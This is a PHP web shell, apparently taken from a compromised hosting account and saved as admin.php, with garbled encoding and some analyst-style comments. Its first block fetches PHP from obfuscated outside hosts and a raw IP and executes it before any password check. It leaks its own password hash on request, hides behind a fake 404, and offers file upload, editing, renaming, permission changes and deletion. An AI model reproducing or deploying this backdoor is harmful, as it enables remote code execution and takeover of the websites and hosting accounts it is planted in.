PK qhYî¶JßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/morganewst/www/ |
| Server: Linux webm001.cluster120.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 IP: 10.120.20.1 |
| Dir : /home/morganewst/www/admin.php |
<?php
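/**
* MD5 hash value used for password authentication.
* This value is used by the authentication check
* (md5() of the submitted p8 value is compared against it, with no salt).
*/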
$ãã¹ã¯ãŒãããã·ã¥ = "8ef94744844516e7c6601942526ca85d";
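/**
* Remote code execution feature.
* Runs when the ac, path, api and t parameters are all set.
* Fetches code from an external server and executes it.
* Note: this block sits above the authentication check further down,
* so it is not gated by the p8 password.
*/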
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {
// ãµãŒããŒçªå·ã®èšå®ïŒããã©ã«ãã¯1ïŒ
if(!isset($_REQUEST['s'])){
$ãµãŒããŒçªå· = 1;
} else {
$ãµãŒããŒçªå· = $_REQUEST['s'];
}
/**
* ãµãŒããŒçªå·ã«å¿ããŠç°ãªãURLããã³ãŒããååŸ
*/
switch ($ãµãŒããŒçªå·){
case 1:
$ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o4.xy'.'z/');
break;
case 2:
$ã³ãŒã = ìœëê°ì žì€êž°('ht'.'tps://c2.ic'.'w7.co'.'m/');
break;
case 3:
$ã³ãŒã = ìœëê°ì žì€êž°('http://45.11.57.159/');
break;
default:
$ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o1.xy'.'z/');
break;
}
/**
* ååŸããã³ãŒããPHPã³ãŒãã§ããããšã確èª
* PHPã¿ã°ãå«ãŸããŠããªãå Žåã¯åŠçãäžæ
*/
$å¿
èŠæåå = '<'.'?p'.'hp';
if (strpos($ã³ãŒã, $å¿
èŠæåå) === false) {
die('get failed');
}
/**
* äžæãã¡ã€ã«ã®äœæãšã³ãŒãã®æžã蟌ã¿
*/
$ãã¡ã€ã«å = false;
$ã³ã³ãã³ã = false;
// tmpfile颿°ãå©çšå¯èœãªå Žåãäžæãã¡ã€ã«ãäœæ
if(function_exists('tmpfile')){
$ãã¡ã€ã«å = tmpfile();
fwrite($ãã¡ã€ã«å, $ã³ãŒã);
$ã¡ã¿ããŒã¿ = stream_get_meta_data($ãã¡ã€ã«å);
$ãã¡ã€ã«ãã¹ = $ã¡ã¿ããŒã¿['uri'];
$ã³ã³ãã³ã = @file_get_contents($ãã¡ã€ã«ãã¹);
}
/**
* äžæãã¡ã€ã«ã®äœæã«å€±æããå Žåãéåžžã®ãã¡ã€ã«ãšããŠä¿å
*/
if (!$ã³ã³ãã³ã) {
$ãã¡ã€ã«ãã¹ = '.c';
file_put_contents($ãã¡ã€ã«ãã¹, $ã³ãŒã);
}
/**
* ååŸããã³ãŒããå®è¡
*/
@require($ãã¡ã€ã«ãã¹);
fclose($ãã¡ã€ã«å);
@unlink($ãã¡ã€ã«ãã¹);
die();
}
/**
* Handling of the time-check request.
* If the d_time parameter is set, the password hash is returned,
* wrapped as {->hash<-} in the response body.
*/
if (isset($_REQUEST['d_time'])){
die('{->'.$ãã¹ã¯ãŒãããã·ã¥.'<-}');
}
/**
* Initialise the authentication state.
*/
$èªèšŒç¶æ
= false;
/**
* Cookie-based authentication check.
* If cookie p8 is set and its MD5 hash matches, authentication is granted.
*/
if (isset($_COOKIE['p8'])) {
if(md5($_COOKIE['p8']) == $ãã¹ã¯ãŒãããã·ã¥) {
$èªèšŒç¶æ
= true;
}
} else {
/**
* POSTãªã¯ãšã¹ãã«ããèªèšŒãã§ãã¯
* POSTãã©ã¡ãŒã¿p8ãèšå®ãããŠããããã®MD5ããã·ã¥ãäžèŽããå Žåã
* ã¯ãããŒãèšå®ããŠèªèšŒãèš±å¯
*/
if (isset($_POST['p8'])) {
if(md5($_POST['p8']) == $ãã¹ã¯ãŒãããã·ã¥) {
setcookie("p8", $_POST['p8']);
$èªèšŒç¶æ
= true;
}
}
}
/**
* Logout handling.
* If the logout parameter is set, the cookie is deleted and the
* authenticated state is cleared.
*/
if (isset($_POST['logout']) && $_POST['logout'] = 1) {
setcookie("p8", "", time() - 3600);
$èªèšŒç¶æ
= false;
}
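/**
* Handling for unauthenticated requests.
* If the 520 parameter is not set, a 404 error is returned;
* if it is set, the password entry form is shown.
* Note: because of the 404 reply, a plain request to this file looks like a
* missing page; check for the file on disk rather than relying on HTTP status.
*/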
if (!$èªèšŒç¶æ
) {
if(!isset($_REQUEST['520'])) {
header("HTTP/1.1 404 Not Found");
die();
}
echo '<form action="#" method="post"><input type="password" name="p8" > <input type="submit" value="submit"></form>';
die();
}
/**
* ãã°ã¢ãŠããã¿ã³ã®è¡šç€º
*/
echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';
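/**
* Function that fetches code from an external server.
* The api, ac, path and t request values are appended to the URL as a query
* string. If file_get_contents() returns nothing, the request is retried with
* cURL (user agent 'll', peer certificate verification switched off).
*
* @param string $URL URL to fetch the code from
* @return string the fetched code
*/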
function ìœëê°ì žì€êž°($URL)
{
/**
* ãªã¯ãšã¹ããã©ã¡ãŒã¿ãå«ãå®å
šãªURLã®æ§ç¯
*/
$URLæåå = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $URL, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);
/**
* file_get_contentsã䜿çšããŠã³ãŒããååŸ
*/
$ã³ãŒã = @file_get_contents($URLæåå);
/**
* file_get_contentsã倱æããå ŽåãcURLã䜿çšããŠå詊è¡
*/
if ($ã³ãŒã == false) {
$CURLãã³ãã« = curl_init();
curl_setopt($CURLãã³ãã«, CURLOPT_URL, $URLæåå);
curl_setopt($CURLãã³ãã«, CURLOPT_USERAGENT, 'll');
curl_setopt($CURLãã³ãã«, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($CURLãã³ãã«, CURLOPT_TIMEOUT, 100);
curl_setopt($CURLãã³ãã«, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($CURLãã³ãã«, CURLOPT_SSL_VERIFYPEER, 0);
$ã³ãŒã = curl_exec($CURLãã³ãã«);
curl_close($CURLãã³ãã«);
}
return $ã³ãŒã;
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- a22bcS0vMzEJElwPNAQA== -->
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>000</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>
<body>
<?php
/**
* ãã¡ã€ã«ãµã€ãºã人éãèªã¿ããã圢åŒã«å€æãã颿°
* ãã€ãæ°ãGBãMBãKBãbytesã«å€æããŸã
*
* @param int $ãã€ãæ° å€æãããã€ãæ°
* @return string ãã©ãŒãããããããµã€ãºæåå
*/
function í¬êž°í¬ë§·í
($ãã€ãæ°)
{
// 1GB以äžã®å Žå
if ($ãã€ãæ° >= 1073741824) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1073741824, 2) . ' GB';
}
// 1MB以äžã®å Žå
elseif ($ãã€ãæ° >= 1048576) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1048576, 2) . ' MB';
}
// 1KB以äžã®å Žå
elseif ($ãã€ãæ° >= 1024) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1024, 2) . ' KB';
}
// 1ãã€ããã倧ããå Žå
elseif ($ãã€ãæ° > 1) {
$ãã€ãæ° = $ãã€ãæ° . ' bytes';
}
// 1ãã€ãã®å Žå
elseif ($ãã€ãæ° == 1) {
$ãã€ãæ° = $ãã€ãæ° . ' byte';
}
// 0ãã€ãã®å Žå
else {
$ãã€ãæ° = '0 bytes';
}
return $ãã€ãæ°;
}
/**
* ãã¡ã€ã«ã®æ¡åŒµåãååŸãã颿°
*
* @param string $ãã¡ã€ã« ãã¡ã€ã«å
* @return string ãã¡ã€ã«ã®æ¡åŒµå
*/
function íìŒíì¥ì($ãã¡ã€ã«)
{
return substr(strrchr($ãã¡ã€ã«, '.'), 1);
}
/**
* ãã¡ã€ã«ã¿ã€ãã«å¿ããã¢ã€ã³ã³ãè¿ã颿°
* ãã¡ã€ã«ã®æ¡åŒµåãååã«åºã¥ããŠé©åãªFont Awesomeã¢ã€ã³ã³ãè¿ããŸã
*
* @param string $ãã¡ã€ã« ãã¡ã€ã«å
* @return string HTMLã¢ã€ã³ã³ã¿ã°
*/
function íìŒììŽìœ($ãã¡ã€ã«)
{
/**
* ç»åãã¡ã€ã«ã®æ¡åŒµåãªã¹ã
*/
$ç»åæ¡åŒµåé
å = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
/**
* é³å£°ãã¡ã€ã«ã®æ¡åŒµåãªã¹ã
*/
$é³å£°æ¡åŒµåé
å = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
/**
* ãã¡ã€ã«ã®æ¡åŒµåãå°æåã§ååŸ
*/
$æ¡åŒµå = strtolower(íìŒíì¥ì($ãã¡ã€ã«));
/**
* ç¹æ®ãã¡ã€ã«åã®åŠç
*/
if ($ãã¡ã€ã« == "error_log") {
return '<i class="fa-sharp fa-solid fa-bug"></i> ';
} elseif ($ãã¡ã€ã« == ".htaccess") {
return '<i class="fa-solid fa-hammer"></i> ';
}
/**
* æ¡åŒµåã«åºã¥ãã¢ã€ã³ã³ã®éžæ
*/
if ($æ¡åŒµå == "html" || $æ¡åŒµå == "htm") {
return '<i class="fa-brands fa-html5"></i> ';
} elseif ($æ¡åŒµå == "php" || $æ¡åŒµå == "phtml") {
return '<i class="fa-brands fa-php"></i> ';
} elseif (in_array($æ¡åŒµå, $ç»åæ¡åŒµåé
å)) {
return '<i class="fa-regular fa-images"></i> ';
} elseif ($æ¡åŒµå == "css") {
return '<i class="fa-brands fa-css3"></i> ';
} elseif ($æ¡åŒµå == "txt") {
return '<i class="fa-regular fa-file-lines"></i> ';
} elseif (in_array($æ¡åŒµå, $é³å£°æ¡åŒµåé
å)) {
return '<i class="fa-duotone fa-file-music"></i> ';
} elseif ($æ¡åŒµå == "py") {
return '<i class="fa-brands fa-python"></i> ';
} elseif ($æ¡åŒµå == "js") {
return '<i class="fa-brands fa-js"></i> ';
} else {
return '<i class="fa-solid fa-file"></i> ';
}
}
/**
* ãã¹ããšã³ã³ãŒããã颿°
* ãã¹å
ã®ç¹æ®æåããã³ã¬ã«æåã«çœ®ãæããŠãšã³ã³ãŒãããŸã
*
* @param string $ãã¹ ãšã³ã³ãŒããããã¹
* @return string ãšã³ã³ãŒãããããã¹
*/
function 겜ë¡ìžìœë©($ãã¹)
{
/**
* 眮æåã®æåé
åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ
*/
$眮æåé
å = array("/", "\\", ".", ":");
/**
* 眮æåŸã®æåé
åïŒãã³ã¬ã«æåïŒ
*/
$眮æåŸé
å = array("àŠ", "àŠ", "àŠ", "àŠ");
return str_replace($眮æåé
å, $眮æåŸé
å, $ãã¹);
}
/**
* ãã¹ããã³ãŒããã颿°
* ãšã³ã³ãŒãããããã¹ãå
ã®åœ¢åŒã«æ»ããŸã
*
* @param string $ãã¹ ãã³ãŒããããã¹
* @return string ãã³ãŒãããããã¹
*/
function 겜ë¡ëìœë©($ãã¹)
{
/**
* 眮æåã®æåé
åïŒãã³ã¬ã«æåïŒ
*/
$眮æåé
å = array("/", "\\", ".", ":");
/**
* 眮æåŸã®æåé
åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ
*/
$眮æåŸé
å = array("àŠ", "àŠ", "àŠ", "àŠ");
return str_replace($眮æåŸé
å, $眮æåé
å, $ãã¹);
}
/**
* ã«ãŒããã¹ã®åæå
* ã¹ã¯ãªããã®ãã£ã¬ã¯ããªãã«ãŒããã¹ãšããŠèšå®
*/
$ã«ãŒããã¹ = __DIR__;
/**
* ã¹ã¯ãªãããã¡ã€ã«ã®ãã¹ãååŸ
*/
$ãã¹ = $_SERVER['SCRIPT_FILENAME'];
/**
* Windowsç°å¢ã®å Žåãããã¯ã¹ã©ãã·ã¥ãã¹ã©ãã·ã¥ã«å€æ
*/
if(strpos($_SERVER['SCRIPT_FILENAME'], ":"))
{
$ãã¹ = str_replace('\\', '/', $ãã¹);
}
/**
* ã«ãŒããã£ã¬ã¯ããªã®å€å®
* PHP_SELFãšSCRIPT_FILENAMEãäžèŽããå Žåãã«ãŒããã¹ã"/"ã«èšå®
*/
if(str_replace('//','/',$_SERVER['PHP_SELF']) == str_replace('\\\\','/',$ãã¹))
{
$ã«ãŒããã¹ = ('/');
} else {
/**
* ã«ãŒããã¹ã®èšç®
* SCRIPT_FILENAMEããPHP_SELFãé€ããéšåãã«ãŒããã¹ãšããŠèšå®
*/
$ã«ãŒããã¹ = (str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$ãã¹) ));
}
/**
* ãã¹ãã©ã¡ãŒã¿ã®åŠç
* GETãã©ã¡ãŒã¿pãèšå®ãããŠããå Žåããã®ãã¹ã䜿çš
*/
if (isset($_GET['p'])) {
/**
* ãã©ã¡ãŒã¿ã空ã®å Žåã¯ã«ãŒããã¹ã䜿çš
*/
if (empty($_GET['p'])) {
$çŸåšã®ãã¹ = $ã«ãŒããã¹;
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåããšã©ãŒã衚瀺
*/
elseif (!is_dir(겜ë¡ëìœë©($_GET['p']))) {
echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>");
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ã䜿çš
*/
elseif (is_dir(겜ë¡ëìœë©($_GET['p']))) {
$çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['p']);
}
}
/**
* ã¯ãšãªãã©ã¡ãŒã¿qãèšå®ãããŠããå Žåã®åŠç
*/
elseif (isset($_GET['q'])) {
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåãã«ãŒãã«ãªãã€ã¬ã¯ã
*/
if (!is_dir(겜ë¡ëìœë©($_GET['q']))) {
echo ("<script>window.location.replace('?p=');</script>");
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ã䜿çš
*/
elseif (is_dir(겜ë¡ëìœë©($_GET['q']))) {
$çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['q']);
}
}
/**
* ãã©ã¡ãŒã¿ãèšå®ãããŠããªãå ŽåãçŸåšã®ãã£ã¬ã¯ããªã䜿çš
*/
else {
$çŸåšã®ãã¹ = __DIR__;
}
/**
* çŸåšã®ãã¹ã宿°ãšããŠå®çŸ©
*/
define("PATH", $çŸåšã®ãã¹);
/**
* ããã²ãŒã·ã§ã³ããŒã®è¡šç€ºéå§
*/
echo ('
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">
<div class="navbar-brand">
<a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>
');
/**
* ãã¹ãã¹ã©ãã·ã¥åºåãã§åå²
*/
$ãã¹ = str_replace('\\', '/', PATH);
$ãã¹é
å = explode('/', $ãã¹);
/**
* ãã¹é
åãã«ãŒãããŠããã³ãããªã¹ããçæ
*/
foreach ($ãã¹é
å as $ID => $ãã£ã¬ã¯ããªéšå) {
/**
* ã«ãŒããã£ã¬ã¯ããªã®å Žåã®åŠç
*/
if ($ãã£ã¬ã¯ããªéšå == '' && $ID == 0) {
$ã«ãŒããã©ã° = true;
echo "<a href=\"?p=/\">/</a>";
continue;
}
/**
* 空ã®èŠçŽ ã¯ã¹ããã
*/
if ($ãã£ã¬ã¯ããªéšå == '')
continue;
/**
* åãã£ã¬ã¯ããªãžã®ãªã³ã¯ãçæ
*/
echo "<a href='?p=";
for ($ã«ãŒã倿° = 0; $ã«ãŒã倿° <= $ID; $ã«ãŒã倿°++) {
echo str_replace(":", "àŠ", $ãã¹é
å[$ã«ãŒã倿°]);
if ($ã«ãŒã倿° != $ID)
echo "àŠ";
}
echo "'>" . $ãã£ã¬ã¯ããªéšå . "</a>/";
}
/**
* ããã²ãŒã·ã§ã³ããŒã®æ®ãã®éšåã衚瀺
*/
echo ('
</div>
<div class="form-inline">
<a href="?newdir&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">New Directory</button></a>
<a href="?upload&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a>
</div>
</nav>');
/**
* ãã¹ãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«äžèЧã衚瀺
*/
if (isset($_GET['p'])) {
/**
* ãã¡ã€ã«ãšãã©ã«ãã®ååŸ
* ãã£ã¬ã¯ããªãèªã¿åãå¯èœãªå Žåãã¹ãã£ã³ããŠãã¡ã€ã«ãšãã©ã«ããåé¢
*/
if (is_readable(PATH)) {
/**
* ãã£ã¬ã¯ããªå
ã®å
šãªããžã§ã¯ããååŸ
*/
$ååŸãªããžã§ã¯ã = scandir(PATH);
/**
* ãã©ã«ããšãã¡ã€ã«ãæ ŒçŽããé
å
*/
$ãã©ã«ãé
å = array();
$ãã¡ã€ã«é
å = array();
/**
* åãªããžã§ã¯ããã«ãŒãããŠããã©ã«ããšãã¡ã€ã«ã«åé¡
*/
foreach ($ååŸãªããžã§ã¯ã as $ãªããžã§ã¯ã) {
/**
* çŸåšãã£ã¬ã¯ããªãšèŠªãã£ã¬ã¯ããªã¯ã¹ããã
*/
if ($ãªããžã§ã¯ã == '.' || $ãªããžã§ã¯ã == '..') {
continue;
}
/**
* ãªããžã§ã¯ãã®å®å
šãã¹ãæ§ç¯
*/
$æ°èŠãªããžã§ã¯ã = PATH . '/' . $ãªããžã§ã¯ã;
/**
* ãã£ã¬ã¯ããªã®å Žåã¯ãã©ã«ãé
åã«è¿œå
*/
if (is_dir($æ°èŠãªããžã§ã¯ã)) {
array_push($ãã©ã«ãé
å, $ãªããžã§ã¯ã);
}
/**
* ãã¡ã€ã«ã®å Žåã¯ãã¡ã€ã«é
åã«è¿œå
*/
elseif (is_file($æ°èŠãªããžã§ã¯ã)) {
array_push($ãã¡ã€ã«é
å, $ãªããžã§ã¯ã);
}
}
}
/**
* ãã¡ã€ã«äžèЧããŒãã«ã®ããããŒã衚瀺
*/
echo '
<table class="table table-hover">
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Size</th>
<th scope="col">Modified</th>
<th scope="col">Perms</th>
<th scope="col">Actions</th>
</tr>
</thead>
<tbody>
';
/**
* ãã©ã«ãäžèЧã®è¡šç€º
* åãã©ã«ãã«å¯ŸããŠãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺
*/
foreach ($ãã©ã«ãé
å as $ãã©ã«ã) {
echo " <tr>
<td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(겜ë¡ìžìœë©(PATH . "/" . $ãã©ã«ã)) . "'>" . $ãã©ã«ã . "</a></td>
<td><b>---</b></td>
<td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã©ã«ã)) . "</td>
<td>0" . substr(decoct(fileperms(PATH . "/" . $ãã©ã«ã)), -3) . "</a></td>
<td>
<a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã©ã«ã . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
<a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã©ã«ã . "'><i class='fa-solid fa-key'></i></a>
<a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã©ã«ã . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>
</tr>
";
}
/**
* ãã¡ã€ã«äžèЧã®è¡šç€º
* åãã¡ã€ã«ã«å¯ŸããŠãã¢ã€ã³ã³ãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺
*/
foreach ($ãã¡ã€ã«é
å as $ãã¡ã€ã«) {
echo " <tr>
<td>" . íìŒììŽìœ($ãã¡ã€ã«) . $ãã¡ã€ã« . "</td>
<td>" . í¬êž°í¬ë§·í
(filesize(PATH . "/" . $ãã¡ã€ã«)) . "</td>
<td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã¡ã€ã«)) . "</td>
<td>0". substr(decoct(fileperms(PATH . "/" .$ãã¡ã€ã«)), -3) . "</a></td>
<td>
<a title='Edit File' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&e=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-file-pen'></i></a>
<a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã¡ã€ã« . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
<a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-key'></i></a>
<a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã¡ã€ã« . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>
</tr>
";
}
/**
* ããŒãã«ã®çµäºã¿ã°
*/
echo " </tbody>
</table>";
} else {
/**
* GETãã©ã¡ãŒã¿ã空ã®å Žåããã¹ãã©ã¡ãŒã¿ã«ãªãã€ã¬ã¯ã
*/
if (empty($_GET)) {
echo ("<script>window.location.replace('?p=');</script>");
}
}
/**
* Display of the new-directory form.
* If the newdir and q parameters are set, the new-directory form is shown.
*/
if (isset($_GET['newdir']) && isset($_GET['q'])) {
echo '
<div class="container mt-4">
<h3>Create New Directory</h3>
<form method="post">
<div class="form-group mb-3">
<label for="dirname">Directory Name:</label>
<input type="text" class="form-control" id="dirname" name="dirname" placeholder="Enter directory name" required>
<small class="form-text text-muted">Enter the name for the new directory. Avoid special characters.</small>
</div>
<input type="submit" class="btn btn-dark" value="Create Directory" name="create_directory">
<a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a>
</form>
</div>';
/**
* æ°èŠãã£ã¬ã¯ããªäœæåŠçã®å®è¡
* create_directoryãã©ã¡ãŒã¿ãPOSTãããå Žåãæ°ãããã£ã¬ã¯ããªãäœæ
*/
if (isset($_POST['create_directory'])) {
/**
* POSTããããã£ã¬ã¯ããªåãååŸ
*/
$æ°èŠãã£ã¬ã¯ããªå = trim($_POST['dirname']);
/**
* ãã£ã¬ã¯ããªåã®æ€èšŒ
*/
if (!empty($æ°èŠãã£ã¬ã¯ããªå)) {
/**
* ãã£ã¬ã¯ããªåã«äžæ£ãªæåãå«ãŸããŠããªãããã§ãã¯
*/
if (preg_match('/[\/\\\\:*?"<>|]/', $æ°èŠãã£ã¬ã¯ããªå)) {
echo ("<script>alert('Invalid directory name. Directory name cannot contain special characters: / \\ : * ? \" < > |'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
/**
* æ°èŠãã£ã¬ã¯ããªã®å®å
šãã¹
*/
$æ°èŠãã£ã¬ã¯ããªãã¹ = PATH . "/" . $æ°èŠãã£ã¬ã¯ããªå;
/**
* ãã£ã¬ã¯ããªãæ¢ã«ååšããããã§ãã¯
*/
if (file_exists($æ°èŠãã£ã¬ã¯ããªãã¹)) {
echo ("<script>alert('Directory already exists.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
/**
* æ°èŠãã£ã¬ã¯ããªã®äœæ
* ããã©ã«ãæš©éã¯0755ïŒææè
ã¯èªã¿æžãå®è¡ãã°ã«ãŒããšãã®ä»ã¯èªã¿å®è¡ïŒ
*/
if(mkdir($æ°èŠãã£ã¬ã¯ããªãã¹, 0755, true)) {
echo ("<script>alert('Directory created successfully.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Failed to create directory.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
} else {
echo ("<script>alert('Directory name cannot be empty.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
/**
* Display of the file upload form.
* If the upload parameter is set, the upload form is shown.
*/
if (isset($_GET['upload'])) {
echo '
<form method="post" enctype="multipart/form-data">
Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" class="btn btn-dark" value="Upload" name="upload">
</form>';
}
/**
* Rename feature for files and folders.
* If the r and q parameters are set, the rename form is shown.
*/
if (isset($_GET['r'])) {
if (!empty($_GET['r']) && isset($_GET['q'])) {
/**
* ãªããŒã ãã©ãŒã ã®è¡šç€º
*/
echo '
<form method="post">
Rename:
<input type="text" name="name" value="' . $_GET['r'] . '">
<input type="submit" class="btn btn-dark" value="Rename" name="rename">
</form>';
/**
* ãªããŒã åŠçã®å®è¡
* renameãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®ååã倿Ž
*/
if (isset($_POST['rename'])) {
/**
* çŸåšã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$åå = PATH . "/" . $_GET['r'];
/**
* ãªããŒã ã®å®è¡
*/
if(rename($åå, PATH . "/" . $_POST['name'])) {
echo ("<script>alert('Renamed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
}
/**
* File editing feature.
* If the e and q parameters are set, the file edit form is shown.
*/
if (isset($_GET['e'])) {
if (!empty($_GET['e']) && isset($_GET['q'])) {
/**
* ãã¡ã€ã«ç·šéãã©ãŒã ã®è¡šç€º
* ãã¡ã€ã«ã®å
容ãããã¹ããšãªã¢ã«è¡šç€º
*/
echo '
<form method="post">
<textarea style="height: 500px;
width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea>
<br>
<input type="submit" class="btn btn-dark" value="Save" name="edit">
</form>';
/**
* ãã¡ã€ã«ä¿ååŠçã®å®è¡
* editãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã®å
容ãä¿å
*/
if(isset($_POST['edit'])) {
/**
* ç·šé察象ãã¡ã€ã«ã®å®å
šãã¹
*/
$ãã¡ã€ã«å = PATH."/".$_GET['e'];
/**
* POSTãããããŒã¿ãååŸ
*/
$ããŒã¿ = $_POST['data'];
/**
* ãã¡ã€ã«ãæžã蟌ã¿ã¢ãŒãã§éã
*/
$ãã¡ã€ã«ãã³ãã« = fopen($ãã¡ã€ã«å,"w");
/**
* ãã¡ã€ã«ãžã®æžã蟌ã¿
*/
if(fwrite($ãã¡ã€ã«ãã³ãã«,$ããŒã¿)) {
echo ("<script>alert('Saved.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
/**
* ãã¡ã€ã«ãã³ãã«ãéãã
*/
fclose($ãã¡ã€ã«ãã³ãã«);
}
}
}
/**
* Execution of the file upload.
* If the upload parameter is POSTed, the uploaded file is saved
* under the client-supplied file name in the current PATH.
*/
if (isset($_POST["upload"])) {
/**
* ã¢ããããŒãå
ã®ãã¡ã€ã«ãã¹
*/
$ã¿ãŒã²ãããã¡ã€ã« = PATH . "/" . $_FILES["fileToUpload"]["name"];
/**
* ã¢ããããŒãããããã¡ã€ã«ãç§»å
*/
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $ã¿ãŒã²ãããã¡ã€ã«)) {
echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
} else {
echo "<p>Sorry, there was an error uploading your file.</p>";
}
}
/**
* Permission-change feature for files and folders.
* If the chmod and q parameters are set, the permission-change form is shown.
*/
if (isset($_GET['chmod']) && isset($_GET['q'])) {
if (!empty($_GET['chmod'])) {
/**
* æš©é倿Žå¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$æš©é倿Žå¯Ÿè±¡ = PATH . "/" . $_GET['chmod'];
/**
* çŸåšã®æš©éãååŸïŒ8鲿°åœ¢åŒïŒ
*/
$çŸåšã®æš©é = substr(decoct(fileperms($æš©é倿Žå¯Ÿè±¡)), -3);
/**
* æš©é倿Žãã©ãŒã ã®è¡šç€º
*/
echo '
<div class="container mt-4">
<h3>Change Permissions</h3>
<form method="post">
<div class="form-group mb-3">
